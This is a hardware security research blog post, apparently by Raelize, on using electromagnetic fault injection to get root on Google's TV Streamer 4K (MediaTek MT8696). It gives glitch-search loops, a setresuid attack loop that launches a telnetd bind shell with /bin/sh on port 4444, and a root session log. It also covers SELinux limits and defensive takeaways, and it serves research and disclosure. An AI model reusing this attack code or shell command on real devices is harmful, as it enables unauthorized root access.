<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-armasm" data-lang="armasm"><span style="display:flex;"><span>mov <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x0</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>adrp <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0</span>x???<span style="color:#6272a4">; // entirely different instruction
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span>
</span></span></code></pre></div><p>The counter  <code>x1</code> ends up set to &ldquo;something big&rdquo;, not <code>4</code>.</p>
<p>You can imagine, if this code snippet as used for something security sensitive, things could have gone wrong immensely.</p>
<h3 id="applicable-attacks">Applicable attacks</h3>
<p>What can we do with an arbitrary instruction-corruption primitive on this chip?</p>
<ul>
<li><strong>Bypass Secure Boot</strong> — e.g., execute an unsigned bootloader.</li>
<li><strong>Break debug security</strong> — e.g., unlock EDL in ROM.</li>
<li><strong>Escalate privileges</strong> — <code>shell</code> → <code>root</code>, <code>user</code> → <code>kernel</code>, REE → TEE.</li>
<li>&hellip;</li>
</ul>
<p>We decided to pursue escalating privileges. This is <strong>not a new idea.</strong> In 2017 we published <a href="https://raelize.com/blog/escalating-privileges-in-linux-using-voltage-fault-injection/"><em>Escalating Privileges in Linux using Voltage Fault Injection</em></a> and presented it at various <a href="https://raelize.com/upload/research/2017/2017_Hardwear-io_KERNELFAULT-Pwning-Linux-using-Hardware-Fault-Injection_NT-CM.pdf">conferences</a>. For that research, we demonstrated an attack where we escalated from an unprivileged user to root on Linux, using a voltage glitch. What could be the difference for doing this on an Android device?</p>
<!--
    Characterization
-->
<h2 id="characterization">Characterization</h2>
<p>An FI attack on an unfamiliar SoC always starts with <strong>characterization</strong>. We need to find <em>where</em> on the chip&rsquo;s surface a glitch has any effect and <em>what</em> power level produces useful corruption.</p>
<h3 id="characterization-code">Characterization code</h3>
<p>The test code is a tight, unrolled add loop. The register starts at <code>0</code> and gets incremented <code>10,000</code> times. After the loop, we read the register back into memory; if the value is not exactly <code>10000</code>, an instruction got corrupted, and we log the result to a file.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#ff79c6">volatile</span> <span style="color:#8be9fd">uint32_t</span> counter;
</span></span><span style="display:flex;"><span><span style="color:#ff79c6">while</span> (<span style="color:#bd93f9">1</span>) {
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">asm</span> <span style="color:#ff79c6">volatile</span>(
</span></span><span style="display:flex;"><span>        <span style="color:#f1fa8c">&#34;mov r3, #0;&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f1fa8c">&#34;add r3, r3, #1;&#34;</span>   <span style="color:#6272a4">// repeat 10,000 times
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>        ...
</span></span><span style="display:flex;"><span>        <span style="color:#f1fa8c">&#34;mov %[counter], r3;&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">:</span> [counter] <span style="color:#f1fa8c">&#34;=r&#34;</span> (counter) <span style="color:#ff79c6">:</span> <span style="color:#ff79c6">:</span> <span style="color:#f1fa8c">&#34;r3&#34;</span>
</span></span><span style="display:flex;"><span>    );
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">if</span> (counter <span style="color:#ff79c6">!=</span> <span style="color:#bd93f9">10000</span>) {
</span></span><span style="display:flex;"><span>        <span style="color:#50fa7b">fprintf</span>(file, <span style="color:#f1fa8c">&#34;counter = AAAA%08xBBBB%08xCCCC</span><span style="color:#f1fa8c">\n</span><span style="color:#f1fa8c">&#34;</span>, counter, counter);
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">break</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Normally we would send the response back to our system, however, in this case we decided to write to a file. It runs forever in the background. It has <strong>no trigger</strong> and <strong>no direct response</strong>. When it gets glitched successfully, it leaves a file behind, and that&rsquo;s how we know we affected one or more of the add instructions.</p>
<h3 id="characterization-flow">Characterization flow</h3>
<p>The characterization flow is shown below.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/characterization-flow.png">
        <img src="/images/blog/tvstreamer-emfi-original/characterization-flow.png" alt="Characterization loop: reset, run canary, glitch, poll result" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>Characterization loop: reset, run the canary in the background, inject a glitch, poll for the result file. No trigger, no delay.</em></p>
<p>We drive the experiment from the host laptop. No trigger, no delay, we just hammer the chip with random glitches and watch what comes back through <code>adb</code>.</p>
<h3 id="glitch-parameter-search">Glitch parameter search</h3>
<p>The campaign runs in two phases. Phase 1 is a coarse sweep over the chip&rsquo;s surface; Phase 2 zooms in on whatever Phase 1 marked as sensitive (i.e., we see changes in the behavior of the SoC). In phase 1 we typically do not know yet if it&rsquo;s a good location to get a successful glitch.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#6272a4"># phase 1: initial scan — coarse XY, coarse amplitude</span>
</span></span><span style="display:flex;"><span><span style="color:#ff79c6">for</span> location <span style="color:#ff79c6">in</span> locations:
</span></span><span style="display:flex;"><span>    move_probe(location)
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">for</span> power <span style="color:#ff79c6">in</span> <span style="color:#8be9fd;font-style:italic">range</span>(<span style="color:#bd93f9">0</span>, <span style="color:#bd93f9">100</span>, <span style="color:#bd93f9">10</span>):
</span></span><span style="display:flex;"><span>        response <span style="color:#ff79c6">=</span> glitch(power)
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">if</span> response <span style="color:#ff79c6">!=</span> expected:
</span></span><span style="display:flex;"><span>            sensitive[location] <span style="color:#ff79c6">=</span> power
</span></span><span style="display:flex;"><span>            <span style="color:#ff79c6">break</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#6272a4"># phase 2: fine search around the sensitive spots</span>
</span></span><span style="display:flex;"><span><span style="color:#ff79c6">for</span> location, start <span style="color:#ff79c6">in</span> cycle(sensitive<span style="color:#ff79c6">.</span>items()):
</span></span><span style="display:flex;"><span>    move_probe(location)
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">for</span> power <span style="color:#ff79c6">in</span> <span style="color:#8be9fd;font-style:italic">range</span>(start <span style="color:#ff79c6">-</span> <span style="color:#bd93f9">10</span>, <span style="color:#bd93f9">100</span>, <span style="color:#bd93f9">1</span>):
</span></span><span style="display:flex;"><span>        response <span style="color:#ff79c6">=</span> glitch(power)
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">break</span>
</span></span></code></pre></div><p>The initial scan over the whole surface takes <strong>about 40 minutes</strong>. Phase 2 can take as long as it needs to find a good location.</p>
<h3 id="characterization-results">Characterization results</h3>
<p>We like to plot the experiments to visually see what locations yield successful glitches.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/characterization-results.png">
        <img src="/images/blog/tvstreamer-emfi-original/characterization-results.png" alt="Three phase plots of characterization glitch results" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>Left: phase 1. Middle: phase 2. Right: locations with success.</em></p>
<p>The three plots tell the story:</p>
<ul>
<li><strong>Initial scan (5,100 glitches).</strong> Coarse XY sweep across the package. Mostly green dots = &ldquo;no effect&rdquo;, with scattered yellow (&ldquo;reset&rdquo;) and magenta (&ldquo;adb timeout&rdquo;). Already a handful of red (successful corruption) dots cluster in specific regions. <strong>Expected: 97.8 %</strong>, <strong>Successes: 7 (0.13 %)</strong>.</li>
<li><strong>Sensitive locations (7,196 glitches).</strong> We zoom into the regions that showed any effect in Phase 1 and sweep them more densely. The dots cluster on a small number of XY hot-spots that consistently produce non-green results. <strong>Expected: 91.1 %</strong>, <strong>Successes: 25 (0.3 %)</strong>.</li>
<li><strong>Only successful (12,497 glitches total).</strong> Filtering to red-only, the productive band on the chip becomes obvious — a narrow XY strip where the corrupted-counter signature shows up. <strong>Successes: 32 (0.3 %)</strong>.</li>
</ul>
<h3 id="characterization-responses">Characterization responses</h3>
<p>Each glitch falls into one of a small set of categories. The interesting ones are the corrupted-counter signatures — they tell us exactly which instruction got perturbed:</p>
<div style="overflow-x:auto; margin: 1.5em auto; width: 90%;">
<table style="width:100%; border-collapse:separate; border-spacing:0; font-family: 'DejaVu Sans Mono', Menlo, Consolas, monospace; font-size: 0.74rem; line-height: 1.35; border-radius: 8px; overflow: hidden; box-shadow: 0 2px 8px rgba(0,0,0,0.25); white-space: nowrap;">
  <thead>
    <tr style="background:#2c333b; color:#e4ecf2; text-align:left;">
      <th style="padding:6px 10px;">Response (final counter)</th>
      <th style="padding:6px 10px;">Description</th>
      <th style="padding:6px 10px; text-align:right;">Amount</th>
    </tr>
  </thead>
  <tbody>
    <tr style="background:#e8f5e9; color:#1b5e20;">
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #d0e6d3;"><code style="background:none;">AAAA 00002710 BBBB 00002710 CCCC</code></td>
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #d0e6d3;">expected (no effect) — counter = <code style="background:none;">10000</code></td>
      <td style="padding:6px 10px; border-bottom:1px solid #d0e6d3; text-align:right; font-weight:600;">11,725</td>
    </tr>
    <tr style="background:#fdecec; color:#7a1a14;">
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;"><code style="background:none;">""</code> (empty)</td>
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;">adb timeout</td>
      <td style="padding:6px 10px; border-bottom:1px solid #f0cfcf; text-align:right; font-weight:600;">475</td>
    </tr>
    <tr style="background:#fdecec; color:#7a1a14;">
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;"><code style="background:none;">""</code> (empty)</td>
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;">timeout (no response)</td>
      <td style="padding:6px 10px; border-bottom:1px solid #f0cfcf; text-align:right; font-weight:600;">266</td>
    </tr>
    <tr style="background:#fdecec; color:#7a1a14;">
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;"><code style="background:none;">AAAA 0000270f BBBB 0000270f CCCC</code></td>
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;">counter − 1 (one add skipped / operand glitched)</td>
      <td style="padding:6px 10px; border-bottom:1px solid #f0cfcf; text-align:right; font-weight:600;">7</td>
    </tr>
    <tr style="background:#fdecec; color:#7a1a14;">
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;"><code style="background:none;">AAAA 0000270e BBBB 0000270e CCCC</code></td>
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;">counter − 2</td>
      <td style="padding:6px 10px; border-bottom:1px solid #f0cfcf; text-align:right; font-weight:600;">7</td>
    </tr>
    <tr style="background:#fdecec; color:#7a1a14;">
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;"><code style="background:none;">AAAA 0000270c BBBB 0000270c CCCC</code></td>
      <td style="text-align:left; padding:6px 10px; border-bottom:1px solid #f0cfcf;">counter − 4</td>
      <td style="padding:6px 10px; border-bottom:1px solid #f0cfcf; text-align:right; font-weight:600;">5</td>
    </tr>
    <tr style="background:#fdecec; color:#7a1a14;">
      <td style="text-align:left; padding:6px 10px;"><code style="background:none;">AAAA ff82155e BBBB ff82155e CCCC</code></td>
      <td style="text-align:left; padding:6px 10px;">counter = some address (opcode glitched)</td>
      <td style="padding:6px 10px; text-align:right; font-weight:600;">1</td>
    </tr>
  </tbody>
</table>
</div>
<p>These type of results are what we are typically looking for and a good indication <em>Instruction Corruption</em> is in effect.</p>
<h3 id="quad-core-analysis">Quad-Core analysis</h3>
<p>We took a little side-step to analyze the impact of the quad-core CPU of the MT8696 SoC. We re-ran the campaign pinned to each core with <code>taskset</code> and concluded, as expected, all cores are vulnerable.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/quad-core-analysis.png">
        <img src="/images/blog/tvstreamer-emfi-original/quad-core-analysis.png" alt="Per-core characterization results pinned with taskset" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>Per-core characterization (pinned with <code>taskset</code>)</em></p>
<p>The vulnerable regions where we affect each core, are roughly in the same area of the chip, but slightly different.</p>
<h3 id="fixing-the-probe">Fixing the probe</h3>
<p>We decided to pick a single sweet spot for the remainder of the work. After a bit of discussion, we decided to go for the location where most successful glitches were clustered.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/fixing-the-probe.png">
        <img src="/images/blog/tvstreamer-emfi-original/fixing-the-probe.png" alt="Chosen fixed-probe XY position circled on the chip" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>The fixed-probe XY position (circled) — the single XY where we landed the bulk of the productive corruptions.</em></p>
<p>From this point on, we vary only the glitch power and let the asynchronous nature of the no-trigger loop sample the timing for us.</p>
<!--
    Getting root
-->
<h2 id="getting-root">Getting root</h2>
<p>With a reliable, characterized corruption primitive in hand, we can swap the test code for the real attack.</p>
<h3 id="glitching-setresuid">Glitching setresuid</h3>
<p>The <code>setresuid</code> syscall sets the real, effective, and saved UIDs of the calling process. In the Linux kernel:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#8be9fd">long</span> <span style="color:#50fa7b">__sys_setresuid</span>(<span style="color:#8be9fd">uid_t</span> ruid, <span style="color:#8be9fd">uid_t</span> euid, <span style="color:#8be9fd">uid_t</span> suid) {
</span></span><span style="display:flex;"><span>    ...
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">if</span> ((...) <span style="color:#ff79c6">&amp;&amp;</span> <span style="color:#ff79c6">!</span><span style="color:#50fa7b">ns_capable_setid</span>(old<span style="color:#ff79c6">-&gt;</span>user_ns, CAP_SETUID))   <span style="color:#6272a4">// capability check
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>        <span style="color:#ff79c6">return</span> <span style="color:#ff79c6">-</span>EPERM;
</span></span><span style="display:flex;"><span>    ...
</span></span><span style="display:flex;"><span>    retval <span style="color:#ff79c6">=</span> <span style="color:#50fa7b">security_task_fix_setuid</span>(new, old, LSM_SETID_RES); <span style="color:#6272a4">// LSM hook
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>    <span style="color:#ff79c6">if</span> (retval <span style="color:#ff79c6">&lt;</span> <span style="color:#bd93f9">0</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">goto</span> error;
</span></span><span style="display:flex;"><span>    ...
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">return</span> <span style="color:#50fa7b">commit_creds</span>(new);                                   <span style="color:#6272a4">// commit new creds
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>}
</span></span></code></pre></div><p>There are two checks between us (uid = 2000) and <code>commit_creds(new)</code> with <code>new-&gt;uid = 0</code>:</p>
<ul>
<li>The <strong>capability check</strong> <code>ns_capable_setid(..., CAP_SETUID)</code> which returns <code>false</code> for <code>shell</code>.</li>
<li>The <strong>LSM hook</strong> <code>security_task_fix_setuid()</code> which in principle lets a LSM veto.</li>
</ul>
<p>Only the <code>commoncap</code> LSM is in play (i.e., <code>CONFIG_SECURITY_SAFESETID</code> is not set). We are mostly interested in bypassing the <code>ns_capable_setid()</code> check.</p>
<h3 id="attack-code">Attack code</h3>
<p>The attacking code is as small as we could make it.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#ff79c6">while</span> (<span style="color:#bd93f9">1</span>) {
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">asm</span> <span style="color:#ff79c6">volatile</span>(
</span></span><span style="display:flex;"><span>        <span style="color:#f1fa8c">&#34;mov r0, #0;&#34;</span>       <span style="color:#6272a4">// ruid
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>        <span style="color:#f1fa8c">&#34;mov r1, #0;&#34;</span>       <span style="color:#6272a4">// euid
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>        <span style="color:#f1fa8c">&#34;mov r2, #0;&#34;</span>       <span style="color:#6272a4">// suid
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>        <span style="color:#f1fa8c">&#34;mov r7, #208;&#34;</span>     <span style="color:#6272a4">// __NR_setresuid32
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>        <span style="color:#f1fa8c">&#34;swi #0;&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f1fa8c">&#34;mov %[ret], r0;&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">:</span> [ret] <span style="color:#f1fa8c">&#34;=r&#34;</span> (ret) <span style="color:#ff79c6">:</span> <span style="color:#ff79c6">:</span> <span style="color:#f1fa8c">&#34;r0&#34;</span>, <span style="color:#f1fa8c">&#34;r1&#34;</span>, <span style="color:#f1fa8c">&#34;r2&#34;</span>
</span></span><span style="display:flex;"><span>    );
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">if</span> (ret <span style="color:#ff79c6">==</span> <span style="color:#bd93f9">0</span>) {
</span></span><span style="display:flex;"><span>        <span style="color:#50fa7b">system</span>(<span style="color:#f1fa8c">&#34;touch /data/local/tmp/setresuid/success.txt&#34;</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#50fa7b">system</span>(<span style="color:#f1fa8c">&#34;/data/local/tmp/setresuid/telnetd-static -p 4444 -l /bin/sh&#34;</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">break</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>It loops on <code>setresuid(0, 0, 0)</code>. On success (i.e., <code>ret == 0</code>), it drops a file the host can poll for via adb, then launches a static <code>telnetd</code> on port 4444 with <code>/bin/sh</code>. <strong>No trigger, no direct response</strong>, same idea as the characterization code, just with a much more interesting &ldquo;success&rdquo; condition.</p>
<h3 id="attack-flow">Attack flow</h3>
<p>The host-side loop is almost identical to the characterization flow, with one change at the success branch: on YES we leave a <code>telnetd-static</code> listener behind and stop.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/attack-flow.png">
        <img src="/images/blog/tvstreamer-emfi-original/attack-flow.png" alt="Attack loop that leaves a telnetd listener on success" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>The attack loop; on a successful glitch we keep <code>telnetd</code> running and stop glitching</em></p>
<p>We sweep the glitch amplitude inside the band that characterization said was productive:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#6272a4"># attack loop</span>
</span></span><span style="display:flex;"><span>move_probe(location)
</span></span><span style="display:flex;"><span><span style="color:#ff79c6">while</span> <span style="color:#ff79c6">True</span>:
</span></span><span style="display:flex;"><span>    glitch_power <span style="color:#ff79c6">=</span> random<span style="color:#ff79c6">.</span>randint(<span style="color:#bd93f9">50</span>, <span style="color:#bd93f9">90</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">...</span>
</span></span></code></pre></div><p>No trigger, no delay. We are injecting random glitches constantly, and waiting.</p>
<h3 id="successful-attack">Successful attack</h3>
<p>Eventually, a glitch lands. The host loop sees the new sentinel file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>110 0 55 G b&#39;root\nstart.sh\ntelnetd-static\n&#39; 46
</span></span><span style="display:flex;"><span>111 0 21 G b&#39;root\nstart.sh\ntelnetd-static\n&#39; 46
</span></span><span style="display:flex;"><span>112 0 40 G b&#39;root\nstart.sh\ntelnetd-static\n&#39; 46
</span></span><span style="display:flex;"><span>113 0 58 R b&#39;root\nstart.sh\nsuccess.txt\ntelnetd-static&#39;
</span></span><span style="display:flex;"><span>SUCCESS: try to connect to host:4444
</span></span></code></pre></div><p>And we telnet in:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ telnet 10.0.0.119 <span style="color:#bd93f9">4444</span>
</span></span><span style="display:flex;"><span>Trying 10.0.0.119...
</span></span><span style="display:flex;"><span>Connected to 10.0.0.119.
</span></span><span style="display:flex;"><span>Escape character is <span style="color:#f1fa8c">&#39;^]&#39;</span>.
</span></span><span style="display:flex;"><span>kirkwood:/ <span style="color:#6272a4">#</span>
</span></span></code></pre></div><p>Root:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kirkwood:/ <span style="color:#6272a4"># whoami</span>
</span></span><span style="display:flex;"><span>root
</span></span></code></pre></div><p>Job done. One EM pulse, one corrupted branch inside <code>__sys_setresuid</code>, one credential commit later, we are uid 0 on Google&rsquo;s TV Streamer 4K.</p>
<h3 id="limitations">Limitations</h3>
<p>But we are <em>not</em> free. SELinux is still on, still enforcing, and our domain has not moved:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kirkwood:/ <span style="color:#6272a4"># id -Z</span>
</span></span><span style="display:flex;"><span>u:r:shell:s0
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>kirkwood:/ <span style="color:#6272a4"># xxd /dev/block/by-name/boot_a</span>
</span></span><span style="display:flex;"><span>xxd: /dev/block/by-name/boot_a: Permission denied
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>kirkwood:/ <span style="color:#6272a4"># logcat -d | grep avc</span>
</span></span><span style="display:flex;"><span>09-09 05:21:47.836 <span style="color:#bd93f9">3922</span> W xxd : <span style="color:#8be9fd;font-style:italic">type</span><span style="color:#ff79c6">=</span><span style="color:#bd93f9">1400</span> audit<span style="color:#ff79c6">(</span>0.0:45<span style="color:#ff79c6">)</span>: avc:  denied
</span></span><span style="display:flex;"><span><span style="color:#8be9fd;font-style:italic">scontext</span><span style="color:#ff79c6">=</span>u:r:shell:s0 <span style="color:#8be9fd;font-style:italic">tcontext</span><span style="color:#ff79c6">=</span>u:object_r:kernel:s0 <span style="color:#8be9fd;font-style:italic">permissive</span><span style="color:#ff79c6">=</span><span style="color:#bd93f9">0</span>
</span></span></code></pre></div><p>We&rsquo;re <code>uid 0</code>, but we&rsquo;re still pinned to the <code>shell</code> SELinux context. Many of the most interesting reads, including flash partitions, kernel memory, anything in the kernel object class, remain remains inaccessible. To turn this <code>root</code> into a <strong>full device compromise</strong>, we would have to exploit another software or hardware vulnerability, in order to bypass SELinux. That&rsquo;s research for another session.</p>
<!--
    Bonus
-->
<h2 id="bonus-syslog-dump">Bonus: syslog dump</h2>
<p>While we were here, we tried the same trick on another tempting in-kernel check: <code>check_syslog_permissions</code> inside <code>do_syslog</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#8be9fd">int</span> <span style="color:#50fa7b">do_syslog</span>(<span style="color:#8be9fd">int</span> type, <span style="color:#8be9fd">char</span> <span style="color:#ff79c6">*</span>buf, <span style="color:#8be9fd">int</span> len, <span style="color:#8be9fd">int</span> src) {
</span></span><span style="display:flex;"><span>    ...
</span></span><span style="display:flex;"><span>    error <span style="color:#ff79c6">=</span> <span style="color:#50fa7b">check_syslog_permissions</span>(type, source);
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">if</span> (error)
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">return</span> error;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">switch</span> (type) {
</span></span><span style="display:flex;"><span>        ...
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">case</span> <span style="color:#8be9fd;font-style:italic">SYSLOG_ACTION_READ_ALL</span>:
</span></span><span style="display:flex;"><span>            ...
</span></span><span style="display:flex;"><span>            error <span style="color:#ff79c6">=</span> <span style="color:#50fa7b">syslog_print_all</span>(buf, len, clear);
</span></span><span style="display:flex;"><span>            <span style="color:#ff79c6">break</span>;
</span></span><span style="display:flex;"><span>        ...
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>If we can corrupt the same kind of conditional branch, we get to skip <code>check_syslog_permissions</code> and have the kernel read out its own <code>syslog</code> buffer into a user-mode buffer for us. We did land this one too. Could be useful, as the syslog buffer is often printing interesting information otherwise not accessible from the <code>shell</code> user. We&rsquo;re working on a few other things in this same shape — <em>maybe next year</em> 😉.</p>
<!--
    Takeaways
-->
<h2 id="takeaways">Takeaways</h2>
<ul>
<li><strong>The Mediatek MT8696&rsquo;s CPU is vulnerable to EM glitches.</strong> Even at ~1.8 GHz, EMFI on the package can corrupt individual instructions in reproducible ways.</li>
<li><strong>Fault attacks on a running Android device are practical.</strong> Yes, you pay overhead for booting, but it&rsquo;s possible to land a successful glitch. Needless to say, a glitch attack during boot is likely more efficient.</li>
<li><strong>Android&rsquo;s Software Security Model fails under FI attacks.</strong> The capability checks inside syscalls are exactly the kind of single conditional decisions that FI can easily bypass.</li>
<li><strong>Defense-in-depth still pays.</strong> We get <code>uid = 0</code>, but <strong>SELinux</strong> keeps us pinned inside the <code>shell</code> domain. Without a <em>second</em> successful glitch (or a software vulnerability in the SELinux decision path), this is not yet a full device compromise.</li>
<li><strong>Kernel R/W is the natural next step.</strong> Once you can peek and poke in kernel memory; it will be possible to bypass the restrictions more efficiently.</li>
</ul>
<p>Feel free to reach out if you have any questions and/or remarks.</p>
<p>- Raelize<span style="color:yellow">.</span></p>
</div>
                

                
                
            </div>
        </div>
    </div>
</section>


  </div><!-- end Contact Area -->
<footer id="footer" class="section-bg">
	<div class="container">
		<div class="row wow fadeInUp" data-wow-duration="500ms">
			<div class="col-xl-12">

				<!-- Footer Social Links -->
				<div class="social-icon">
					<ul class="list-inline">
						
						<li class="list-inline-item"><a href="https://twitter.com/raelizecom" rel="nofollow"><i class="ti-twitter-alt"></i></a></li>
						
						<li class="list-inline-item"><a href="https://www.linkedin.com/company/raelize" rel="nofollow"><i class="ti-linkedin"></i></a></li>
						
					</ul>
				</div>

				<!-- copyright -->
				<div class="copyright text-center">
					<a href="https://raelize.com/">
						<img src="https://raelize.com/images/logo.png" alt="Raelize - Embedded Device Security Testing, Consultancy &amp; Training" height="42" />
					</a>
					<br>
					<p>Copyright ©2020 Raelize B.V. <br> Powered by <a href=#>Hugo</a> and <a href="https://themefisher.com">Themefisher</a>.</p>
				</div>
			</div>
		</div>
	</div>
</footer>
<!-- /footer -->

<!-- Google Map API -->


<!-- JS Plugins -->

<script src="https://raelize.com/plugins/jquery/jquery.min.js"></script>

<script src="https://raelize.com/plugins/bootstrap/bootstrap.min.js"></script>

<script src="https://raelize.com/plugins/slick/slick.min.js"></script>

<script src="https://raelize.com/plugins/shuffle/shuffle.min.js"></script>

<script src="https://raelize.com/plugins/magnific-popup/jquery.magnific-popup.min.js"></script>

<script src="https://raelize.com/plugins/lazy-load/lozad.min.js"></script>

<script src="https://raelize.com/plugins/google-map/map.js"></script>


<!-- Main Script -->

<script src="https://raelize.com/js/script.min.117f25fdd69809937e03f47113cbf673f49c2074d65da15ea1d385ad742d92a49ed5dd2000a4585ecfdebda6feb7ef54.js" integrity="sha384-EX8l/daYCZN&#43;A/RxE8v2c/ScIHTWXaFeodOFrXQtkqSe1d0gAKRYXs/evab&#43;t&#43;9U"></script>


</body>

</html>
